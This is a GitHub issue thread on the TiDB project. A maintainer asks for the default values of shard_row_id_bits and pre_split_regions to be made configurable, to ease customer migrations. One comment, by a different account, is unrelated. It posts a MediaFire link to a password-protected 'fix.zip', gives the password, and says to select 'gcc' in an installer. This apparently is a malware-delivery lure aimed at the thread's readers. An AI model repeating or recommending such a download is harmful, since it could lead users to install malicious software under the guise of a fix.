### ISSUE TITLE
The default values of shard_row_id_bits and pre_split_regions should be configurable

### ISSUE THREAD

**Issue by jackysp** [pingcap/tidb#55716]
## Feature Request

**Is your feature request related to a problem? Please describe:**

The default values of shard_row_id_bits and pre_split_regions are 0, which make the customers have to set it one by one on their table schemas.

**Describe the feature you'd like:**

Make the default values of shard_row_id_bits and pre_split_regions be configurable.

**Describe alternatives you've considered:**

No.

**Teachability, Documentation, Adoption, Migration Strategy:**

When a new customer want to migrate his database to TiDB, we nearly always suggest them to set shard_row_id_bits and pre_split_regions on their tables, make the default values configurable will make the migration easier.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by jackysp** [comment]
Related to https://internal.pingcap.net/jira/browse/FRM-22
